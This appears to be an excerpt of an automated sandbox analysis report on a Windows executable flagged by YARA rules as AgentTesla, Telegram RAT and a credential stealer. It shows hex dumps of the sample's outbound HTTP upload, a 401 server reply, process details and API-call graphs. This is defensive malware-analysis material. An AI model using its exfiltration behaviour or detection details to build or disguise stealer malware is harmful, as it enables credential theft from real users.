                                                2024-07-25 22:03:17 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:03:17 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:03:17 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:03:17 UTC7422OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:03:17 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 34 30 65 37 61 30 33 30 38 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcacd40e7a0308--
                                                2024-07-25 22:03:17 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:03:17 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:03:17 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:17:59:07
                                                Start date:25/07/2024
                                                Path:C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
                                                Imagebase:0xb80000
                                                File size:697'350 bytes
                                                MD5 hash:67CF14E98914A0AE61CDA009D3ED1DF7
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:17:59:13
                                                Start date:25/07/2024
                                                Path:C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"
                                                Imagebase:0xc50000
                                                File size:697'350 bytes
                                                MD5 hash:67CF14E98914A0AE61CDA009D3ED1DF7
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:7.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:118
                                                  Total number of Limit Nodes:11
                                                  execution_graph 31148 2f135e8 31149 2f13610 31148->31149 31150 2f13606 31148->31150 31153 2f1363b 31150->31153 31157 2f13650 31150->31157 31154 2f1366c 31153->31154 31162 2f12bb4 31154->31162 31158 2f1365e 31157->31158 31161 2f1367d 31157->31161 31159 2f12bb4 FindCloseChangeNotification 31158->31159 31160 2f13679 31159->31160 31160->31149 31161->31149 31163 2f137c8 FindCloseChangeNotification 31162->31163 31164 2f13679 31163->31164 31164->31149 31165 2f11508 31166 2f11693 31165->31166 31167 2f1152e 31165->31167 31167->31166 31170 2f11780 31167->31170 31173 2f11788 PostMessageW 31167->31173 31171 2f11788 PostMessageW 31170->31171 31172 2f117f4 31171->31172 31172->31167 31174 2f117f4 31173->31174 31174->31167 31134 172d438 31135 172d47e 31134->31135 31139 172d618 31135->31139 31142 172d609 31135->31142 31136 172d56b 31145 172b790 31139->31145 31143 172d646 31142->31143 31144 172b790 DuplicateHandle 31142->31144 31143->31136 31144->31143 31146 172d680 DuplicateHandle 31145->31146 31147 172d646 31146->31147 31147->31136 31175 1724668 31176 172467a 31175->31176 31180 1724686 31176->31180 31181 1724778 31176->31181 31178 17246a5 31186 1724204 31180->31186 31182 172479d 31181->31182 31190 1724878 31182->31190 31194 1724888 31182->31194 31187 172420f 31186->31187 31202 1725c6c 31187->31202 31189 1727048 31189->31178 31191 17248af 31190->31191 31193 172498c 31191->31193 31198 17244e4 31191->31198 31196 17248af 31194->31196 31195 172498c 31195->31195 31196->31195 31197 17244e4 CreateActCtxA 31196->31197 31197->31195 31199 1725918 CreateActCtxA 31198->31199 31201 17259db 31199->31201 31203 1725c77 31202->31203 31206 1725c8c 31203->31206 31205 17270ed 31205->31189 31207 1725c97 31206->31207 31210 1725cbc 31207->31210 31209 17271c2 31209->31205 31211 1725cc7 31210->31211 31214 1725cec 31211->31214 31213 17272c5 31213->31209 31215 1725cf7 31214->31215 31217 17285cb 31215->31217 31221 172ac78 31215->31221 31216 1728609 31216->31213 31217->31216 31225 172cd61 31217->31225 31230 172cd70 31217->31230 31235 172acb0 31221->31235 31239 172ac9f 31221->31239 31222 172ac8e 31222->31217 31226 172cd91 31225->31226 31227 172cdb5 31226->31227 31272 172cf20 31226->31272 31276 172cf11 31226->31276 31227->31216 31231 172cd91 31230->31231 31232 172cf20 3 API calls 31231->31232 31233 172cf11 3 API calls 31231->31233 31234 172cdb5 31231->31234 31232->31234 31233->31234 31234->31216 31244 172ada8 31235->31244 31252 172ad99 31235->31252 31236 172acbf 31236->31222 31240 172acb0 31239->31240 31242 172ada8 2 API calls 31240->31242 31243 172ad99 2 API calls 31240->31243 31241 172acbf 31241->31222 31242->31241 31243->31241 31245 172adb9 31244->31245 31247 172addc 31244->31247 31245->31247 31260 172b040 31245->31260 31264 172b030 31245->31264 31246 172add4 31246->31247 31248 172afe0 GetModuleHandleW 31246->31248 31247->31236 31249 172b00d 31248->31249 31249->31236 31253 172adb9 31252->31253 31254 172addc 31252->31254 31253->31254 31258 172b040 LoadLibraryExW 31253->31258 31259 172b030 LoadLibraryExW 31253->31259 31254->31236 31255 172add4 31255->31254 31256 172afe0 GetModuleHandleW 31255->31256 31257 172b00d 31256->31257 31257->31236 31258->31255 31259->31255 31261 172b054 31260->31261 31263 172b079 31261->31263 31268 172a168 31261->31268 31263->31246 31265 172b054 31264->31265 31266 172a168 LoadLibraryExW 31265->31266 31267 172b079 31265->31267 31266->31267 31267->31246 31269 172b220 LoadLibraryExW 31268->31269 31271 172b299 31269->31271 31271->31263 31273 172cf2d 31272->31273 31274 172cf67 31273->31274 31280 172b780 31273->31280 31274->31227 31277 172cf2d 31276->31277 31278 172cf67 31277->31278 31279 172b780 3 API calls 31277->31279 31278->31227 31279->31278 31281 172b78b 31280->31281 31283 172dc78 31281->31283 31284 172d084 31281->31284 31283->31283 31285 172d08f 31284->31285 31286 1725cec 3 API calls 31285->31286 31287 172dce7 31286->31287 31287->31283

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 54aeaee-54aeaf2 1 54aeaf3-54aeb08 0->1 2 54af4b5-54af4c3 0->2 1->2 3 54aeb09-54aeb14 1->3 5 54aeb1a-54aeb26 3->5 6 54aeb32-54aeb41 5->6 8 54aeba0-54aeba4 6->8 9 54aebaa-54aebb3 8->9 10 54aec4c-54aecb6 8->10 11 54aebb9-54aebcf 9->11 12 54aeaae-54aeaba 9->12 10->2 48 54aecbc-54af203 10->48 18 54aec21-54aec33 11->18 19 54aebd1-54aebd4 11->19 12->2 14 54aeac0-54aeacc 12->14 15 54aeace-54aeae2 14->15 16 54aeb43-54aeb49 14->16 15->16 26 54aeae4-54aeaed 15->26 16->2 20 54aeb4f-54aeb67 16->20 30 54aec39-54aec3c 18->30 31 54af3f4-54af4aa 18->31 19->2 22 54aebda-54aec17 19->22 20->2 29 54aeb6d-54aeb95 20->29 22->10 44 54aec19-54aec1f 22->44 26->0 29->8 33 54aec3f-54aec49 30->33 31->2 44->18 44->19 126 54af21a-54af2ad 48->126 127 54af205-54af20f 48->127 128 54af2b8-54af34b 126->128 127->128 129 54af215 127->129 130 54af356-54af3e9 128->130 129->130 130->31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: D
                                                  • API String ID: 0-2746444292
                                                  • Opcode ID: 498587adb61a2e3472d7b06e5cd5d697217615c07d34d13c764704670a7f6da8
                                                  • Instruction ID: b14b7e4ecb13fdfc371c8d6a53578232274bf55732aab4f41b8146aeea543d84
                                                  • Opcode Fuzzy Hash: 498587adb61a2e3472d7b06e5cd5d697217615c07d34d13c764704670a7f6da8
                                                  • Instruction Fuzzy Hash: 5752C674A112299FDB64DF64C898B9DBBB2FF89300F1081D9D509A7365CB34AE81CF91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 449f85e04c1aeb36921bed8675f78b380660a05f80be175174092d2ef2191aff
                                                  • Instruction ID: f31907eca7a094edfba6047518fb72fb79cbe25b413e2dcab2cde844c9187898
                                                  • Opcode Fuzzy Hash: 449f85e04c1aeb36921bed8675f78b380660a05f80be175174092d2ef2191aff
                                                  • Instruction Fuzzy Hash: C4527036B00215DFDB98DF69D488AAE77B2BF99711B15806AF816DB360DB30DC41CB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 155 172ada8-172adb7 156 172ade3-172ade7 155->156 157 172adb9-172adc6 call 172a100 155->157 158 172adfb-172ae3c 156->158 159 172ade9-172adf3 156->159 164 172adc8 157->164 165 172addc 157->165 166 172ae49-172ae57 158->166 167 172ae3e-172ae46 158->167 159->158 210 172adce call 172b040 164->210 211 172adce call 172b030 164->211 165->156 169 172ae7b-172ae7d 166->169 170 172ae59-172ae5e 166->170 167->166 168 172add4-172add6 168->165 171 172af18-172afd8 168->171 172 172ae80-172ae87 169->172 173 172ae60-172ae67 call 172a10c 170->173 174 172ae69 170->174 205 172afe0-172b00b GetModuleHandleW 171->205 206 172afda-172afdd 171->206 176 172ae94-172ae9b 172->176 177 172ae89-172ae91 172->177 175 172ae6b-172ae79 173->175 174->175 175->172 179 172aea8-172aeb1 call 172a11c 176->179 180 172ae9d-172aea5 176->180 177->176 186 172aeb3-172aebb 179->186 187 172aebe-172aec3 179->187 180->179 186->187 188 172aee1-172aeee 187->188 189 172aec5-172aecc 187->189 195 172aef0-172af0e 188->195 196 172af11-172af17 188->196 189->188 191 172aece-172aede call 172a12c call 172a13c 189->191 191->188 195->196 207 172b014-172b028 205->207 208 172b00d-172b013 205->208 206->205 208->207 210->168 211->168
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: e71e0ff16a5387c1f6711840026206f271cedf4faf9836b1b466835d11b6f9a5
                                                  • Instruction ID: 1d8a2c75ddb6143dd7ea9fd4992bb0ac26047d905368769d5ec258c2241eafd2
                                                  • Opcode Fuzzy Hash: e71e0ff16a5387c1f6711840026206f271cedf4faf9836b1b466835d11b6f9a5
                                                  • Instruction Fuzzy Hash: B5714670A00B158FE724DF2AD45575AFBF1FF88204F108A2DD55AD7A40D735E84ACB90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 212 17244e4-17259d9 CreateActCtxA 215 17259e2-1725a3c 212->215 216 17259db-17259e1 212->216 223 1725a4b-1725a4f 215->223 224 1725a3e-1725a41 215->224 216->215 225 1725a60 223->225 226 1725a51-1725a5d 223->226 224->223 228 1725a61 225->228 226->225 228->228
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 017259C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 09df58bc567228c02d039d58f5ebea0c319fb7b40920a3bfe0b51f7ac56d1399
                                                  • Instruction ID: af831741ae1f2279a577916a7b2f050644ff9d3588c3635b47617fb123744866
                                                  • Opcode Fuzzy Hash: 09df58bc567228c02d039d58f5ebea0c319fb7b40920a3bfe0b51f7ac56d1399
                                                  • Instruction Fuzzy Hash: 3E41CEB0C0072DCBEB24CFA9C885BDDBBB5AB49704F20816AD508AB255DB756946CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 229 172590d-17259d9 CreateActCtxA 231 17259e2-1725a3c 229->231 232 17259db-17259e1 229->232 239 1725a4b-1725a4f 231->239 240 1725a3e-1725a41 231->240 232->231 241 1725a60 239->241 242 1725a51-1725a5d 239->242 240->239 244 1725a61 241->244 242->241 244->244
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 017259C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 49736e9fd8461f824ebf4c949f62d411ac687d9658613c86341340d1117d1ab0
                                                  • Instruction ID: 3021ccada1ec47588556f5b59766e18e78566906229319992a9c482f8b1ec960
                                                  • Opcode Fuzzy Hash: 49736e9fd8461f824ebf4c949f62d411ac687d9658613c86341340d1117d1ab0
                                                  • Instruction Fuzzy Hash: A741C170C00719CBEB24CFA9C8857CDFBB1BF49304F20816AD548AB255D7755946CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 245 172b790-172d714 DuplicateHandle 247 172d716-172d71c 245->247 248 172d71d-172d73a 245->248 247->248
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0172D646,?,?,?,?,?), ref: 0172D707
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: eaa7de7e7d448bde33d48bf7906292f79d2270b532f1364779663d0f3cf92bdd
                                                  • Instruction ID: 9df80e1578f5bbd40c8a9d2cda5128a6a3ecf13ae94f136d25c76356ac5cf9e4
                                                  • Opcode Fuzzy Hash: eaa7de7e7d448bde33d48bf7906292f79d2270b532f1364779663d0f3cf92bdd
                                                  • Instruction Fuzzy Hash: 5721E5B5900258EFDB10CFAAD884ADEFBF4EB48310F14845AE914B7350D378A954CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 251 172d678-172d714 DuplicateHandle 252 172d716-172d71c 251->252 253 172d71d-172d73a 251->253 252->253
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0172D646,?,?,?,?,?), ref: 0172D707
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: ad6c13c5023346a1ccffa6399f2af37a6509b4a568c205f8882c0bd2f71721e8
                                                  • Instruction ID: 6497bd3f09990304e27bd38388c9cc36de94156eaf52d8d138bf831bd3b6be0a
                                                  • Opcode Fuzzy Hash: ad6c13c5023346a1ccffa6399f2af37a6509b4a568c205f8882c0bd2f71721e8
                                                  • Instruction Fuzzy Hash: D921D2B5900248DFDB10CFAAD984ADEBBF5EB48310F14851AE958B3350D378A945CF61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 256 172a168-172b260 258 172b262-172b265 256->258 259 172b268-172b297 LoadLibraryExW 256->259 258->259 260 172b2a0-172b2bd 259->260 261 172b299-172b29f 259->261 261->260
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0172B079,00000800,00000000,00000000), ref: 0172B28A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: d3dd381610745d384e057ec9e7621091a497486a23f16ffb9466dca191d3be7f
                                                  • Instruction ID: dd915e3962ca768a407a8610d43d360c211a1563230bc9af6898b38e5a9fa668
                                                  • Opcode Fuzzy Hash: d3dd381610745d384e057ec9e7621091a497486a23f16ffb9466dca191d3be7f
                                                  • Instruction Fuzzy Hash: BA1114B6804349DFDB10CF9AD444ADEFBF4EB89310F10842AD519A7200C379A545CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 264 172b219-172b260 265 172b262-172b265 264->265 266 172b268-172b297 LoadLibraryExW 264->266 265->266 267 172b2a0-172b2bd 266->267 268 172b299-172b29f 266->268 268->267
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0172B079,00000800,00000000,00000000), ref: 0172B28A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 92e341fec89d302419177f7b2d8811b10ff28c9c2cdda26dd9c03956ef3174da
                                                  • Instruction ID: d66f36429e6d4724d5ad2dfc67fac537defb006f237903504fd5f81d6f0defe2
                                                  • Opcode Fuzzy Hash: 92e341fec89d302419177f7b2d8811b10ff28c9c2cdda26dd9c03956ef3174da
                                                  • Instruction Fuzzy Hash: 5E1100B68043498FDB10CFAAC884ADEFBF4AB48310F14842AD529A7200C379A546CFA4

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 271 2f12bb4-2f1382d FindCloseChangeNotification 273 2f13836-2f1385e 271->273 274 2f1382f-2f13835 271->274 274->273
                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02F13679,?,?), ref: 02F13820
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: 14206407b4754685600b051a90e40e4100d963f3c7047a1c4944b7bc1132b21c
                                                  • Instruction ID: dceb8c6fb2e5a5935a806810e2d4a447e28213346dfe12ad084768fb55ab2ae4
                                                  • Opcode Fuzzy Hash: 14206407b4754685600b051a90e40e4100d963f3c7047a1c4944b7bc1132b21c
                                                  • Instruction Fuzzy Hash: 8B1155B2800349DFDB20CF9AC484BDEBBF4EB48320F10845ADA18A7340D338A944CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 277 2f137c0-2f1382d FindCloseChangeNotification 278 2f13836-2f1385e 277->278 279 2f1382f-2f13835 277->279 279->278
                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02F13679,?,?), ref: 02F13820
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: 61ab2942fa7401bfc7eef9ddf20a8b96b678ef5b9278daeac68e294ccb39b68b
                                                  • Instruction ID: 707d452851067b290da15f0985e740a2f4bba697a2527cb6b57eaa6d5b08b965
                                                  • Opcode Fuzzy Hash: 61ab2942fa7401bfc7eef9ddf20a8b96b678ef5b9278daeac68e294ccb39b68b
